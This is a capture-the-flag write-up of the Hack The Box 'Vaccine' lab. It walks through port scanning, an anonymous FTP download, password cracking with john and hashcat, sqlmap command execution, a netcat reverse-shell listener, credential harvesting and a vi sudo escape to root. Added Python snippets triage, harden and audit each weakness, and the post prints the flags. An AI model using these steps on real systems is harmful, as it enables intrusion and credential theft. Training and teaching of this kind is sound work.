HTB – Hack the Box – Tier 2 – 3rd Challenge – Vaccine

Deep Dive: Solving HTB Tier 2 – Challenge 3 ‘Vaccine’

Join us in this technical exploration of the ‘Vaccine’ challenge, part of the “HTB – Hack the Box Series”. This tutorial is one of many in our series designed to advance your cybersecurity skills. Explore more challenges at: HTB – Hack the Box Series.

System Update and VPN Connectivity

Ensure your Kali Linux is updated for the latest functionalities and security patches:

$ sudo apt update
$ sudo apt full-upgrade -y

Establish a secure VPN connection to access the HTB environment:

$ sudo openvpn Downloads/starting_point_UserName.ovpn

Initial Reconnaissance with Nmap

Use Nmap to scan the target for open ports and running services, with default scripts and version detection. The full-range form, covering all 65535 TCP ports, is:

nmap -sC -sV -p- 10.129.239.94

The session below ran the default top-1000-port scan (without -p-), which is why only 997 closed ports are reported:
┌──(toor㉿kali)-[~]
└─$ nmap -sC -sV 10.129.239.94
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-09 11:18 EST
Nmap scan report for 10.129.239.94
Host is up (0.044s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.15.210
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0ee58077534b00b9165b259569527a4 (RSA)
|   256 ac6e81188922d7a7417d814f1bb8b251 (ECDSA)
|_  256 425bc321dfefa20bc95e03421d69d028 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.26 seconds
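The scan output above is exactly what a defender wants to triage automatically rather than read by eye. The following Python is an added example, not code from the post or from Hack The Box: it parses Nmap's normal-format output, groups each port's NSE script lines under that port, and flags the exposures this scan shows (anonymous FTP, a file listed in the anonymous root, a cleartext FTP control channel, and a PHPSESSID cookie served without HttpOnly). SAMPLE_SCAN is constructed from the report shown above; the finding labels and the PortInfo structure are this example's own.

```python
"""Triage an Nmap normal-format report for the exposures seen in the scan above.

Added example (not from the post): parse the text that `nmap -sC -sV` prints,
attach NSE script output to each PORT line, and report what needs fixing.
"""
import re
from dataclasses import dataclass, field

# "21/tcp open  ftp     vsftpd 3.0.3" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# A directory-listing line from ftp-anon; the last field is the file name.
LISTING_RE = re.compile(r"^[-dl][rwxsStT-]{9}\s+\d+\s+\S+\s+\S+\s+\d+\s+.+\s(\S+)$")

# Constructed from the scan in the post, trimmed to the lines the parser uses.
SAMPLE_SCAN = """\
Nmap scan report for 10.129.239.94
Host is up (0.044s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Logged in as ftpuser
|      Control connection is plain text
|      Data connections will be plain text
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
|_  256 425bc321dfefa20bc95e03421d69d028 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""


@dataclass
class PortInfo:
    port: int
    proto: str
    state: str
    service: str
    version: str
    script_lines: list = field(default_factory=list)  # NSE output, "|"/"|_" prefix stripped


def parse_nmap(report: str) -> list:
    """Return one PortInfo per PORT line, with its NSE script lines attached."""
    ports, current = [], None
    for line in report.splitlines():
        if line.startswith("|"):
            if current is not None:
                current.script_lines.append(line.lstrip("|_ ").rstrip())
            continue
        m = PORT_RE.match(line)
        if m:
            current = PortInfo(int(m[1]), m[2], m[3], m[4], m[5].strip())
            ports.append(current)
        else:
            current = None  # any other line ends the current port's block
    return ports


def triage(ports: list) -> list:
    """Return (port, finding) tuples for the conditions a defender should act on."""
    findings = []
    for p in ports:
        if p.state != "open":
            continue
        lines = p.script_lines
        text = "\n".join(lines)
        if p.service == "ftp":
            if "Anonymous FTP login allowed" in text:
                findings.append((p.port, "anonymous FTP login enabled"))
                for l in lines:
                    m = LISTING_RE.match(l)
                    if m:
                        findings.append((p.port, f"file readable by anonymous FTP: {m[1]}"))
            if "Control connection is plain text" in text:
                findings.append((p.port, "FTP control channel is unencrypted"))
        if p.service == "http":
            for i, l in enumerate(lines):
                # http-cookie-flags prints the cookie name on the line before the flag note
                if "httponly flag not set" in l and i > 0:
                    findings.append((p.port, f"session cookie without HttpOnly: {lines[i - 1].rstrip(':')}"))
    return findings


if __name__ == "__main__":
    for port, finding in triage(parse_nmap(SAMPLE_SCAN)):
        print(f"{port:>5}  {finding}")
```

Running it prints four findings, all on ports 21 and 80; port 22 produces none. Each one maps to a configuration fix on the server (disable anonymous_enable in vsftpd.conf or remove the file from the anonymous root, require TLS on the control channel, and set session.cookie_httponly in php.ini).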
  • Besides SSH and HTTP, what other service is hosted on this box? – ftp
  • This service can be configured to allow login with any password for specific username. What is that username? – Anonymous
  • What is the name of the file downloaded over this service? – backup.zip
  • Add the domain name to the local hosts file:
┌──(toor㉿kali)-[~]
└─$ sudo nano /etc/hosts
[sudo] password for toor: 
                                                                                                                                                  
┌──(toor㉿kali)-[~]
└─$ cat /etc/hosts               
127.0.0.1       localhost
127.0.1.1       kali

# HTB
10.129.131.112 unika.htb
10.129.239.94 vaccine.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
                                                                                                                                                  
┌──(toor㉿kali)-[~]
└─$ 
  • FTP to the domain name, authenticate as Anonymous with any password, and download backup.zip:
┌──(toor㉿kali)-[~]
└─$  ftp vaccine.htb
Connected to vaccine.htb.
220 (vsFTPd 3.0.3)
Name (vaccine.htb:toor): Anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>  get backup.zip
local: backup.zip remote: backup.zip
229 Entering Extended Passive Mode (|||10886|)
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
100% |*********************************************************************************************************************************|  2533      774.21 KiB/s    00:00 ETA
226 Transfer complete.
2533 bytes received in 00:00 (60.43 KiB/s)
ftp> quit
221 Goodbye.
                                                                                                                                                                              
┌──(toor㉿kali)-[~]
└─$ 

 

  • What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? – zip2john
┌──(toor㉿kali)-[~]
└─$ locate zip2john               
/usr/sbin/zip2john
                                                                                                                                                                              
┌──(toor㉿kali)-[~]
└─$ 
┌──(toor㉿kali)-[~]
└─$ zip2john backup.zip > hash
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
                                                                                                                                                                              
┌──(toor㉿kali)-[~]
└─$ cat hash                 
backup.zip:$pkzip$2*1*1*0*8*24*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b8f4b225aa15c4ffda8fe72f60a82*2*0*3da*cca*1b1ccd6a*504*43*8*3da*989a*...*$/pkzip$::backup.zip:style.css, index.php:backup.zip
                                                                                                                                                                              
┌──(toor㉿kali)-[~]
└─$
┌──(toor㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (backup.zip)     
1g 0:00:00:00 DONE (2022-11-09 12:27) 50.00g/s 614400p/s 614400c/s 614400C/s 123456..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                              
┌──(toor㉿kali)-[~]
└─$ 
┌──(toor㉿kali)-[~]
└─$ unzip backup.zip                                     
Archive:  backup.zip
[backup.zip] index.php password: 
  inflating: index.php               
  inflating: style.css               
                                                                                                                                                                              
┌──(toor㉿kali)-[~]
└─$ cat index.php   
<!DOCTYPE html>
<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");

 

┌──(toor㉿kali)-[~]
└─$ hashcat -m 0 2cb42f8734ea607eefed3b70af13bbd3 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-AMD Ryzen 5 5600H with Radeon Graphics, 2921/5906 MB (1024 MB allocatable), 6MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

2cb42f8734ea607eefed3b70af13bbd3:qwerty789                
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 2cb42f8734ea607eefed3b70af13bbd3
Time.Started.....: Thu Nov 10 13:16:13 2022 (0 secs)
Time.Estimated...: Thu Nov 10 13:16:13 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1598.9 kH/s (0.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 101376/14344385 (0.71%)
Rejected.........: 0/101376 (0.00%)
Restore.Point....: 98304/14344385 (0.69%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Dominic1 -> ilovehim123
Hardware.Mon.#1..: Util: 14%

Started: Thu Nov 10 13:15:49 2022
Stopped: Thu Nov 10 13:16:14 2022
                                                                                                                                                  
┌──(toor㉿kali)-[~]
└─$ 
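The reason hashcat finished in under a second is visible in index.php: the stored credential is an unsalted MD5 of the password, so one hash per guess (or one lookup on a site like crackstation) is all it takes. The Python below is an added example, not code from the post or from the MegaCorp site: weak_login() ports the index.php check so the weakness is explicit, and hardened_hash()/hardened_verify() show the replacement, PBKDF2-HMAC-SHA256 with a random per-password salt, a stored iteration count, and a constant-time comparison. The digest and password are the ones recovered above; PBKDF2_ITERATIONS, SALT_BYTES and the storage format are this example's own choices.

```python
"""Unsalted MD5 login check beside a salted, iterated replacement.

Added example (not from the post or the target's code).
"""
import hashlib
import hmac
import os
import re

ADMIN_MD5 = "2cb42f8734ea607eefed3b70af13bbd3"  # constant from index.php on the target

# Assumed parameters for the hardened scheme (this example's own choices).
PBKDF2_ITERATIONS = 600_000  # OWASP's recommended work factor for PBKDF2-HMAC-SHA256
SALT_BYTES = 16


def weak_login(username: str, password: str) -> bool:
    """Port of the index.php logic: one fast, unsalted hash compared to a constant.
    Every user with this password stores the same digest, and a wordlist run
    costs one MD5 per guess, which is why rockyou.txt recovered it instantly."""
    return username == "admin" and hashlib.md5(password.encode()).hexdigest() == ADMIN_MD5


def hardened_hash(password: str, salt=None) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>' for storage.
    A fresh random salt per call means the same password never stores the same
    value twice, so a leaked table cannot be cracked with one lookup."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def hardened_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    try:
        iterations = int(parts[1])
        salt, expected = bytes.fromhex(parts[2]), bytes.fromhex(parts[3])
    except ValueError:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # hmac.compare_digest does not short-circuit on the first differing byte.
    return hmac.compare_digest(candidate, expected)


def looks_like_unsalted_digest(stored: str) -> bool:
    """Audit helper: a bare 32/40/64-character hex value in a credential store is
    almost certainly a raw MD5/SHA-1/SHA-256 digest with no salt or work factor."""
    return re.fullmatch(r"[0-9a-fA-F]{32}|[0-9a-fA-F]{40}|[0-9a-fA-F]{64}", stored) is not None


if __name__ == "__main__":
    print("index.php-style check accepts qwerty789:", weak_login("admin", "qwerty789"))
    stored = hardened_hash("qwerty789")
    print("stored:", stored)
    print("verify:", hardened_verify("qwerty789", stored))
    print("stored value looks unsalted:", looks_like_unsalted_digest(stored))
```

Note that the iteration count is stored with the hash, so it can be raised later and old entries re-hashed at next login; and looks_like_unsalted_digest() is the kind of one-line check worth running over any users table found during an audit.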

 

  • What is the password for the admin user on the website? – qwerty789
  • https://crackstation.net/
  • What option can be passed to sqlmap to try to get command execution via the sql injection? – --os-shell
  • Check the available options with: sqlmap -h
  • https://www.revshells.com/
  • Reverse shell payload type used: nc mkfifo (from the revshells.com generator); once the shell connects, upgrade it to an interactive pty with:
python3 -c 'import pty;pty.spawn("/bin/bash");'
┌──(toor㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.104] from (UNKNOWN) [10.129.138.183] 42756
sh: 0: can't access tty; job control turned off
$ whoami
postgres
$ find / -perm -4000 -type f 2>/dev/
sh: 2: cannot create /dev/: Is a directory
$ pwd
/var/lib/postgresql/11/main
$ cd /var/www/html
$ ls
bg.png
dashboard.css
dashboard.js
dashboard.php
index.php
license.txt
style.css
$ grep -i -R "pass" *
dashboard.php:    $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
index.php:  if(isset($_POST['username']) && isset($_POST['password'])) {
index.php:    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
index.php:        <label for="login__password"><svg class="icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#lock"></use></svg><span class="hidden">Password</span></label>
index.php:        <input id="login__password" type="password" name="password" class="form__input" placeholder="Password" required>
style.css:.form input[type='password'],
style.css:.login input[type='password'],
style.css:.login input[type='password'],
style.css:.login input[type='password']:focus,
style.css:.login input[type='password']:hover,
$ 
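The grep above found what made the SSH step possible: a database password sitting in plain text inside dashboard.php in the web root, later reused for the postgres account. A defender should find that before an attacker does. The Python below is an added example, not code from the post or the target: scan_tree() walks a directory, applies a few connection-string and assignment patterns to each text file, and reports file, line and a redacted preview so the finding can be shared without re-leaking the secret. demo() builds a constructed sample tree; its dashboard.php line is the pg_connect string from the grep output above, while index.php and style.css carry the non-matching lines from that output and the .env and settings.py files are invented.

```python
"""Scan a web root for hard-coded database credentials.

Added example (not from the post). Patterns and redaction are this example's own.
"""
import os
import re
import tempfile

# Pattern name -> regex whose group 1 is the secret.
PATTERNS = {
    "libpq connection string": re.compile(r"\bpassword\s*=\s*([^\s'\"]+)"),
    "URL with embedded password": re.compile(r"\b[a-z][a-z0-9+.-]*://[^/\s:@]+:([^@\s]+)@"),
    "password variable assignment": re.compile(r"(?i)\b\$?\w*pass(?:word|wd)?\s*=\s*['\"]([^'\"]+)['\"]"),
}
TEXT_EXT = {".php", ".py", ".js", ".css", ".env", ".ini", ".conf", ".yml", ".yaml", ".txt"}

# Constructed sample files: the dashboard.php line is from the grep output in the post,
# index.php/style.css lines are the non-matching ones from that output, the rest is invented.
SAMPLE_FILES = {
    "dashboard.php": '<?php\n$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");\n?>\n',
    "index.php": "<?php\nif(isset($_POST['username']) && isset($_POST['password'])) {\n?>\n"
                 '<input id="login__password" type="password" name="password" placeholder="Password" required>\n',
    "style.css": ".login input[type='password'],\n",
    ".env": "DATABASE_URL=postgres://app:hunter2@db.internal:5432/carsdb\n",
    "settings.py": 'DB_PASSWORD = "s3cret"\n',
    "bg.png": "\x89PNG password=notscanned\n",  # binary extension: skipped
}


def redact(secret: str) -> str:
    """Keep the first character so the owner can recognise it; hide the rest."""
    return secret[0] + "*" * (len(secret) - 1) if secret else ""


def scan_file(path: str, root: str) -> list:
    findings = []
    with open(path, encoding="utf-8", errors="ignore") as fh:
        for lineno, line in enumerate(fh, 1):
            for kind, pattern in PATTERNS.items():
                m = pattern.search(line)
                if m:
                    findings.append({"file": os.path.relpath(path, root), "line": lineno,
                                     "kind": kind, "preview": redact(m.group(1))})
    return findings


def scan_tree(root: str) -> list:
    """Scan every text-like file under root; results sorted for stable reporting."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            ext = os.path.splitext(name)[1].lower()
            if ext in TEXT_EXT or name.startswith(".env"):
                findings.extend(scan_file(os.path.join(dirpath, name), root))
    return sorted(findings, key=lambda f: (f["file"], f["line"], f["kind"]))


def demo() -> list:
    """Write the constructed sample tree to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name, content in SAMPLE_FILES.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}:{f['line']}  {f['kind']}  ({f['preview']})")
```

The HTML form fields and CSS selectors that the raw grep matched are not reported, because each pattern requires an assignment or a URL shape rather than the bare word "password". The fix on the server side is to move the credential out of the web root into an environment variable or a file readable only by the service account, and to rotate it once it has been found in a document root.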
┌──(toor㉿kali)-[~]
└─$ ssh postgres@vaccine.htb
The authenticity of host 'vaccine.htb (10.129.138.183)' can't be established.
ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'vaccine.htb' (ED25519) to the list of known hosts.
postgres@vaccine.htb's password: 
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 11 Nov 2022 02:39:29 PM UTC

  System load:  0.15              Processes:             187
  Usage of /:   32.6% of 8.73GB   Users logged in:       0
  Memory usage: 19%               IP address for ens160: 10.129.138.183
  Swap usage:   0%


0 updates can be installed immediately.
0 of these updates are security updates.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

postgres@vaccine:~$ sudo -l
[sudo] password for postgres: 
Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
    XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:~$ 
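The single sudo rule above is the whole privilege escalation: an interactive editor running as root. Auditing for that class of rule is mechanical. The Python below is an added example, not code from the post: parse_sudo_l() reads the "may run the following commands" section of sudo's output and audit_rules() flags every allowed binary that is an interactive program with a documented shell escape (the category GTFOBins catalogues), plus NOPASSWD and wildcard rules, and suggests sudoedit where a file edit is all that was wanted. SAMPLE_SUDO_L is constructed from the sudo -l output above; the SHELL_ESCAPE and EDITORS sets and the fix text are this example's own.

```python
"""Audit `sudo -l` output for rules that amount to a root shell.

Added example (not from the post).
"""
import os
import re

# "    (ALL) NOPASSWD: /bin/vi /etc/x, /bin/cat /etc/y" -> runas, tags, command list
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*?)\s*$")
RULES_HEADER = re.compile(r"^User \S+ may run the following commands")

# Interactive programs that can spawn a shell or read/write arbitrary files once
# running as root. Assumed, non-exhaustive list for this example.
SHELL_ESCAPE = {"vi", "vim", "view", "vimdiff", "nano", "ed", "emacs", "less", "more", "man"}
EDITORS = {"vi", "vim", "view", "nano", "ed", "emacs"}

# Constructed from the `sudo -l` output shown in the post.
SAMPLE_SUDO_L = r"""Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
    XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
"""


def parse_sudo_l(output: str) -> list:
    """Return [(runas, tags, command)] for every rule after the 'may run' header."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if RULES_HEADER.match(line):
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m["tags"].split()]
        for cmd in re.split(r",\s*", m["cmds"]):
            rules.append((m["runas"].strip(), tags, cmd))
    return rules


def audit_rules(rules: list) -> list:
    """Flag rules that hand out more than the administrator meant to grant."""
    findings = []
    for runas, tags, cmd in rules:
        argv = cmd.split()
        binary = os.path.basename(argv[0])
        if binary in SHELL_ESCAPE:
            if binary in EDITORS and len(argv) == 2:
                # sudoedit copies the file, runs the editor as the caller, and writes it back as root.
                fix = f"sudoedit {argv[1]}"
            else:
                fix = "wrap the task in a non-interactive script and allow only that script"
            findings.append({"command": cmd, "runas": runas,
                             "issue": f"{binary} has a shell escape, so this rule is effectively a root shell",
                             "fix": fix})
        if "NOPASSWD" in tags:
            findings.append({"command": cmd, "runas": runas, "issue": "no password required",
                             "fix": "drop NOPASSWD unless the command is harmless"})
        if "*" in cmd:
            findings.append({"command": cmd, "runas": runas, "issue": "wildcard in command arguments",
                             "fix": "list the exact arguments"})
        if cmd == "ALL":
            findings.append({"command": cmd, "runas": runas, "issue": "any command allowed",
                             "fix": "enumerate the commands actually needed"})
    return findings


if __name__ == "__main__":
    for f in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"({f['runas']}) {f['command']}\n    issue: {f['issue']}\n    fix:   {f['fix']}")
```

For the rule on this box the output is one finding with the fix "sudoedit /etc/postgresql/11/main/pg_hba.conf": the file can still be edited, but vi runs as postgres and only the final copy is written back as root, so the editor's shell escape gains nothing.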
  • https://gtfobins.github.io/gtfobins/vi/
postgres@vaccine:~$ ls
11  user.txt                                                                                               
postgres@vaccine:~$ cat user.txt                                                                           
ec9b13ca4d6229cd5cc1e09980965bf7                                                                           
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf                                       
                                                                                                           
# whoami                                                                                                   
root                                                                                                       
# cd /root                                                                                                 
# ls                                                                                                       
pg_hba.conf  root.txt  snap                                                                                
# cat root.txt                                                                                             
dd6e058e814260bc70e9bbdef2715849                                                                           
#
  • What program can the postgres user run as root using sudo? – vi
  • user flag – ec9b13ca4d6229cd5cc1e09980965bf7
  • root flag – dd6e058e814260bc70e9bbdef2715849
  • https://www.hackthebox.com/achievement/machine/303878/289

Ethical Hacking Reminder

This guide provides a technical walkthrough for solving the ‘Vaccine’ challenge on HTB. We promote ethical hacking practices and encourage using these skills for enhancing cybersecurity knowledge and defense capabilities.

Cogeanu Marius
https://cogeanu.com
Marius Cogeanu is a distinguished IT consultant and cybersecurity virtuoso based in Prague, Czechia. With a rich 20-year journey in the IT realm, Marius has carved a niche in network security and technological solutions, adeptly harmonizing tech with business requirements. His experience spans from Kyndryl to IBM, and as a valued independent consultant, where he's renowned for his innovative approaches in enhancing business operations with cutting-edge tech. Marius's forte lies in demystifying complex IT concepts, ensuring clarity and alignment for stakeholders at all levels. His commitment to staying at the forefront of industry trends and seeking innovative solutions cements his status as a go-to expert in cybersecurity. Driven by a fervent passion for technology and its potential to revolutionize businesses, Marius thrives on tackling challenging ventures, applying his prowess in network design, IT service management, and strategic planning. Currently, Marius is focused on leading-edge IT project management, infrastructure design, and fortifying cybersecurity, guiding clients through the intricate digital landscape with unmatched expertise and insight. Discover more on https://cogeanu.com
